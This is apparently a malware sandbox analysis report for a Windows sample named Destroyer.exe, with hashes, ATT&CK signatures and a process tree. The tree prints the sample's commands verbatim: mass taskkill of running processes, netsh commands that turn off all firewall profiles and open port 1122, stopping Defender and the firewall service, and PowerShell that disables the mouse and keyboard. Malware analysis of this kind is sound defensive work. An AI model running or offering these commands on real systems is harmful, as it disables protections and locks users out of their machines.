fe37d1ffcde030141e084a28aba766d0555d47665127c41a8af2038db2168591

Analysis

max time kernel
45s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28/05/2024, 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Destroyer.exe
Size

71KB
MD5

cfa188442e3852b7569daf83d8f6d94c
SHA1

2d46033d23cb61f63a9a9769fcb1837c2a97849c
SHA256

fe37d1ffcde030141e084a28aba766d0555d47665127c41a8af2038db2168591
SHA512

e813e55ca5ff28126dfd32789c839799b72db3fc49ff8be4d63bb3e37392608b3040f49c0f9255a39d12e7ae69f88623b7cf6b80e744521f131342e17be66317
SSDEEP

1536:KVIn7vLAsry2eslLS8Ti1nQyd9O3jKVfOOHoHoLOO:KU/9+vstGGGFOCp

Score

8^/10

evasion execution

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 16 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3584	netsh.exe
4396	netsh.exe
1524	netsh.exe
4820	netsh.exe
4424	netsh.exe
2700	netsh.exe
3144	netsh.exe
3284	netsh.exe
5036	netsh.exe
3484	netsh.exe
4200	netsh.exe
3112	netsh.exe
1916	netsh.exe
4700	netsh.exe
4168	netsh.exe
3440	netsh.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4888	powershell.exe
3872	powershell.exe
3408	powershell.exe
3668	powershell.exe
4920	powershell.exe
4824	powershell.exe
5048	powershell.exe
4992	powershell.exe
3992	powershell.exe
4964	powershell.exe
1756	powershell.exe
536	powershell.exe
4360	powershell.exe
2476	powershell.exe
5084	powershell.exe
4708	powershell.exe
3644	powershell.exe
3140	powershell.exe
5108	powershell.exe
4956	powershell.exe
4956	powershell.exe
540	powershell.exe
3484	powershell.exe
3548	powershell.exe
2428	powershell.exe
4992	powershell.exe
4656	powershell.exe
540	powershell.exe
2304	powershell.exe
3376	powershell.exe
4976	powershell.exe
2384	powershell.exe
1912	powershell.exe
3644	powershell.exe
1148	powershell.exe
4232	powershell.exe
4784	powershell.exe
4876	powershell.exe
2100	powershell.exe
3316	powershell.exe
3716	powershell.exe
3440	powershell.exe
2540	powershell.exe
940	powershell.exe
3328	powershell.exe
4680	powershell.exe
4352	powershell.exe
3048	powershell.exe
4644	powershell.exe
3016	powershell.exe
1148	powershell.exe
3308	powershell.exe
1492	powershell.exe
4324	powershell.exe
1984	powershell.exe
3912	powershell.exe
4476	powershell.exe
1168	powershell.exe
936	powershell.exe
2400	powershell.exe
184	powershell.exe
3644	powershell.exe
4700	powershell.exe
2232	powershell.exe

Drops file in System32 directory 58 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3644	tasklist.exe
4544	tasklist.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
4544	taskkill.exe
716	taskkill.exe
2868	taskkill.exe
1556	taskkill.exe
2356	taskkill.exe
1192	taskkill.exe
3152	taskkill.exe
1288	taskkill.exe
3436	taskkill.exe
512	taskkill.exe
3216	taskkill.exe
1152	taskkill.exe
2592	taskkill.exe
2960	taskkill.exe
2348	taskkill.exe
2472	taskkill.exe
4300	taskkill.exe
3068	taskkill.exe
2324	taskkill.exe
3092	taskkill.exe
4052	taskkill.exe
4920	taskkill.exe
1984	taskkill.exe
3916	taskkill.exe
2168	taskkill.exe
4964	taskkill.exe
4396	taskkill.exe
3908	taskkill.exe
4612	taskkill.exe
4860	taskkill.exe
540	taskkill.exe
4412	taskkill.exe
2212	taskkill.exe
1340	taskkill.exe
1116	taskkill.exe
2260	taskkill.exe
2888	taskkill.exe
2400	taskkill.exe
3316	taskkill.exe
1928	taskkill.exe
3524	taskkill.exe
3232	taskkill.exe
952	taskkill.exe
2320	taskkill.exe
856	taskkill.exe
8	taskkill.exe
2120	taskkill.exe
4720	taskkill.exe
2000	taskkill.exe
3228	taskkill.exe
2960	taskkill.exe
4232	taskkill.exe
684	taskkill.exe
3408	taskkill.exe
3220	taskkill.exe
4400	taskkill.exe
2096	taskkill.exe
4956	taskkill.exe
2596	taskkill.exe
3176	taskkill.exe
3412	taskkill.exe
3808	taskkill.exe
2012	taskkill.exe
2628	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4976	powershell.exe
4976	powershell.exe
4680	powershell.exe
4680	powershell.exe
184	powershell.exe
184	powershell.exe
3644	powershell.exe
3644	powershell.exe
3716	powershell.exe
3668	powershell.exe
3668	powershell.exe
4784	powershell.exe
4784	powershell.exe
3332	powershell.exe
3332	powershell.exe
4360	powershell.exe
4360	powershell.exe
3548	powershell.exe
1756	powershell.exe
1756	powershell.exe
3408	powershell.exe
3408	powershell.exe
3440	powershell.exe
3440	powershell.exe
2428	powershell.exe
4920	powershell.exe
4920	powershell.exe
2616	powershell.exe
2616	powershell.exe
4232	powershell.exe
4232	powershell.exe
4876	powershell.exe
1912	powershell.exe
1912	powershell.exe
4700	powershell.exe
4700	powershell.exe
3308	powershell.exe
3308	powershell.exe
4992	powershell.exe
3140	powershell.exe
3140	powershell.exe
4324	powershell.exe
4324	powershell.exe
4888	powershell.exe
4888	powershell.exe
2100	powershell.exe
4352	powershell.exe
4352	powershell.exe
2232	powershell.exe
2232	powershell.exe
4964	powershell.exe
4964	powershell.exe
4656	powershell.exe
5108	powershell.exe
5108	powershell.exe
4336	powershell.exe
4336	powershell.exe
3048	powershell.exe
3048	powershell.exe
4824	powershell.exe
4956	powershell.exe
4956	powershell.exe
1984	powershell.exe
1984	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3644	tasklist.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	3436	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4976	powershell.exe
Token: SeSecurityPrivilege	4976	powershell.exe
Token: SeTakeOwnershipPrivilege	4976	powershell.exe
Token: SeLoadDriverPrivilege	4976	powershell.exe
Token: SeSystemProfilePrivilege	4976	powershell.exe
Token: SeSystemtimePrivilege	4976	powershell.exe
Token: SeProfSingleProcessPrivilege	4976	powershell.exe
Token: SeIncBasePriorityPrivilege	4976	powershell.exe
Token: SeCreatePagefilePrivilege	4976	powershell.exe
Token: SeBackupPrivilege	4976	powershell.exe
Token: SeRestorePrivilege	4976	powershell.exe
Token: SeShutdownPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeSystemEnvironmentPrivilege	4976	powershell.exe
Token: SeRemoteShutdownPrivilege	4976	powershell.exe
Token: SeUndockPrivilege	4976	powershell.exe
Token: SeManageVolumePrivilege	4976	powershell.exe
Token: 33	4976	powershell.exe
Token: 34	4976	powershell.exe
Token: 35	4976	powershell.exe
Token: 36	4976	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe
Token: 36	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	3668	powershell.exe
Token: SeSecurityPrivilege	3668	powershell.exe
Token: SeTakeOwnershipPrivilege	3668	powershell.exe
Token: SeLoadDriverPrivilege	3668	powershell.exe
Token: SeSystemProfilePrivilege	3668	powershell.exe
Token: SeSystemtimePrivilege	3668	powershell.exe
Token: SeProfSingleProcessPrivilege	3668	powershell.exe
Token: SeIncBasePriorityPrivilege	3668	powershell.exe
Token: SeCreatePagefilePrivilege	3668	powershell.exe
Token: SeBackupPrivilege	3668	powershell.exe
Token: SeRestorePrivilege	3668	powershell.exe
Token: SeShutdownPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeSystemEnvironmentPrivilege	3668	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2776 wrote to memory of 3180	2776	Destroyer.exe	84
PID 2776 wrote to memory of 3180	2776	Destroyer.exe	84
PID 3180 wrote to memory of 60	3180	cmd.exe	85
PID 3180 wrote to memory of 60	3180	cmd.exe	85
PID 60 wrote to memory of 3644	60	cmd.exe	86
PID 60 wrote to memory of 3644	60	cmd.exe	86
PID 60 wrote to memory of 4960	60	cmd.exe	87
PID 60 wrote to memory of 4960	60	cmd.exe	87
PID 3180 wrote to memory of 3488	3180	cmd.exe	90
PID 3180 wrote to memory of 3488	3180	cmd.exe	90
PID 3180 wrote to memory of 3688	3180	cmd.exe	91
PID 3180 wrote to memory of 3688	3180	cmd.exe	91
PID 3180 wrote to memory of 2448	3180	cmd.exe	93
PID 3180 wrote to memory of 2448	3180	cmd.exe	93
PID 3180 wrote to memory of 1180	3180	cmd.exe	94
PID 3180 wrote to memory of 1180	3180	cmd.exe	94
PID 3180 wrote to memory of 4360	3180	cmd.exe	95
PID 3180 wrote to memory of 4360	3180	cmd.exe	95
PID 3180 wrote to memory of 2212	3180	cmd.exe	96
PID 3180 wrote to memory of 2212	3180	cmd.exe	96
PID 3180 wrote to memory of 3436	3180	cmd.exe	97
PID 3180 wrote to memory of 3436	3180	cmd.exe	97
PID 3180 wrote to memory of 3524	3180	cmd.exe	99
PID 3180 wrote to memory of 3524	3180	cmd.exe	99
PID 3180 wrote to memory of 4544	3180	cmd.exe	100
PID 3180 wrote to memory of 4544	3180	cmd.exe	100
PID 3180 wrote to memory of 4104	3180	cmd.exe	101
PID 3180 wrote to memory of 4104	3180	cmd.exe	101
PID 3180 wrote to memory of 2596	3180	cmd.exe	102
PID 3180 wrote to memory of 2596	3180	cmd.exe	102
PID 3180 wrote to memory of 4044	3180	cmd.exe	103
PID 3180 wrote to memory of 4044	3180	cmd.exe	103
PID 3180 wrote to memory of 1556	3180	cmd.exe	104
PID 3180 wrote to memory of 1556	3180	cmd.exe	104
PID 3180 wrote to memory of 2232	3180	cmd.exe	105
PID 3180 wrote to memory of 2232	3180	cmd.exe	105
PID 3180 wrote to memory of 4532	3180	cmd.exe	106
PID 3180 wrote to memory of 4532	3180	cmd.exe	106
PID 3180 wrote to memory of 4616	3180	cmd.exe	107
PID 3180 wrote to memory of 4616	3180	cmd.exe	107
PID 3180 wrote to memory of 3092	3180	cmd.exe	109
PID 3180 wrote to memory of 3092	3180	cmd.exe	109
PID 3180 wrote to memory of 2064	3180	cmd.exe	110
PID 3180 wrote to memory of 2064	3180	cmd.exe	110
PID 3180 wrote to memory of 4000	3180	cmd.exe	111
PID 3180 wrote to memory of 4000	3180	cmd.exe	111
PID 3180 wrote to memory of 3864	3180	cmd.exe	112
PID 3180 wrote to memory of 3864	3180	cmd.exe	112
PID 3180 wrote to memory of 2096	3180	cmd.exe	113
PID 3180 wrote to memory of 2096	3180	cmd.exe	113
PID 3180 wrote to memory of 3232	3180	cmd.exe	114
PID 3180 wrote to memory of 3232	3180	cmd.exe	114
PID 3180 wrote to memory of 2708	3180	cmd.exe	115
PID 3180 wrote to memory of 2708	3180	cmd.exe	115
PID 3180 wrote to memory of 1684	3180	cmd.exe	116
PID 3180 wrote to memory of 1684	3180	cmd.exe	116
PID 3180 wrote to memory of 3440	3180	cmd.exe	118
PID 3180 wrote to memory of 3440	3180	cmd.exe	118
PID 3180 wrote to memory of 4976	3180	cmd.exe	119
PID 3180 wrote to memory of 4976	3180	cmd.exe	119
PID 3180 wrote to memory of 716	3180	cmd.exe	120
PID 3180 wrote to memory of 716	3180	cmd.exe	120
PID 3180 wrote to memory of 4480	3180	cmd.exe	121
PID 3180 wrote to memory of 4480	3180	cmd.exe	121

C:\Users\Admin\AppData\Local\Temp\Destroyer.exe
"C:\Users\Admin\AppData\Local\Temp\Destroyer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2776
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2ED0.tmp\2ED1.bat C:\Users\Admin\AppData\Local\Temp\Destroyer.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c tasklist | findstr /r /b ".*.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:60
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3644
  - - C:\Windows\system32\findstr.exe
      findstr /r /b ".*.exe"
      4⤵
      PID:4960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "356"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "444"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3688
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "520"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "528"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "612"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "656"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "664"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "784"
    3⤵
    PID:3524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "792"
    3⤵
    - Kills process with taskkill
    PID:4544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "800"
    3⤵
    PID:4104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "904"
    3⤵
    PID:2596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "956"
    3⤵
    PID:4044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "332"
    3⤵
    - Kills process with taskkill
    PID:1556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "392"
    3⤵
    PID:2232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1044"
    3⤵
    PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1056"
    3⤵
    PID:4616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1064"
    3⤵
    - Kills process with taskkill
    PID:3092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1072"
    3⤵
    PID:2064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1212"
    3⤵
    PID:4000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1232"
    3⤵
    PID:3864
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1296"
    3⤵
    - Kills process with taskkill
    PID:2096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1308"
    3⤵
    - Kills process with taskkill
    PID:3232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1368"
    3⤵
    PID:2708
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1460"
    3⤵
    PID:1684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1472"
    3⤵
    PID:3440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1496"
    3⤵
    PID:4976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1504"
    3⤵
    PID:716
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1640"
    3⤵
    PID:4480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1700"
    3⤵
    PID:4688
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1736"
    3⤵
    PID:4644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1772"
    3⤵
    - Kills process with taskkill
    PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1920"
    3⤵
    PID:3684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1952"
    3⤵
    PID:4156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2040"
    3⤵
    PID:2104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1040"
    3⤵
    - Kills process with taskkill
    PID:4920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1744"
    3⤵
    - Kills process with taskkill
    PID:2472
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1932"
    3⤵
    - Kills process with taskkill
    PID:952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2148"
    3⤵
    - Kills process with taskkill
    PID:4612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2176"
    3⤵
    PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2236"
    3⤵
    PID:1856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2372"
    3⤵
    - Kills process with taskkill
    PID:2356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2492"
    3⤵
    PID:3676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2504"
    3⤵
    PID:1116
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2656"
    3⤵
    PID:3104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2684"
    3⤵
    - Kills process with taskkill
    PID:3216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2748"
    3⤵
    PID:848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2804"
    3⤵
    PID:2608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2816"
    3⤵
    PID:2868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2828"
    3⤵
    PID:1672
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2836"
    3⤵
    PID:4512
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2848"
    3⤵
    - Kills process with taskkill
    PID:2000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2988"
    3⤵
    PID:216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2276"
    3⤵
    PID:636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3252"
    3⤵
    - Kills process with taskkill
    PID:3228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3452"
    3⤵
    - Kills process with taskkill
    PID:2960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3464"
    3⤵
    - Kills process with taskkill
    PID:4860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3652"
    3⤵
    PID:4504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3848"
    3⤵
    - Kills process with taskkill
    PID:4300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4008"
    3⤵
    PID:4428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4092"
    3⤵
    PID:4324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3976"
    3⤵
    PID:4296
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4900"
    3⤵
    - Kills process with taskkill
    PID:540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1864"
    3⤵
    PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "548"
    3⤵
    - Kills process with taskkill
    PID:2888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "808"
    3⤵
    PID:888
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1752"
    3⤵
    PID:1792
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4584"
    3⤵
    PID:60
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1184"
    3⤵
    PID:5044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4844"
    3⤵
    - Kills process with taskkill
    PID:2320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4380"
    3⤵
    - Kills process with taskkill
    PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2908"
    3⤵
    PID:3928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4192"
    3⤵
    PID:3952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4212"
    3⤵
    - Kills process with taskkill
    PID:856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3664"
    3⤵
    - Kills process with taskkill
    PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3928"
    3⤵
    - Kills process with taskkill
    PID:4232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3988"
    3⤵
    - Kills process with taskkill
    PID:4956
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4100"
    3⤵
    PID:412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "2776"
    3⤵
    - Kills process with taskkill
    PID:8
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "1188"
    3⤵
    - Kills process with taskkill
    PID:4412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3180"
    3⤵
    - Kills process with taskkill
    PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "60"
    3⤵
    PID:1580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "3644"
    3⤵
    - Kills process with taskkill
    PID:684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "4960"
    3⤵
    PID:704
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "756"
    3⤵
    - Kills process with taskkill
    PID:3916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=1122
    3⤵
    - Modifies Windows Firewall
    PID:1916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=1122
    3⤵
    - Modifies Windows Firewall
    PID:3584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile firewallpolicy blockinbound,allowoutbound
    3⤵
    - Modifies Windows Firewall
    PID:4700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4396
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:1524
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3284
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:5036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3484
- - C:\Windows\system32\net.exe
    net stop "Windows Defender Service"
    3⤵
    PID:3232
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Windows Defender Service"
      4⤵
      PID:2708
- - C:\Windows\system32\net.exe
    net stop "Windows Firewall"
    3⤵
    PID:1684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Windows Firewall"
      4⤵
      PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe -Command "Get-PnpDevice -Class 'Mouse' | Disable-PnpDevice -Confirm:$false"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe -Command "Get-PnpDevice -Class 'Keyboard' | Disable-PnpDevice -Confirm:$false"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File .scripts\make_file.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:3716
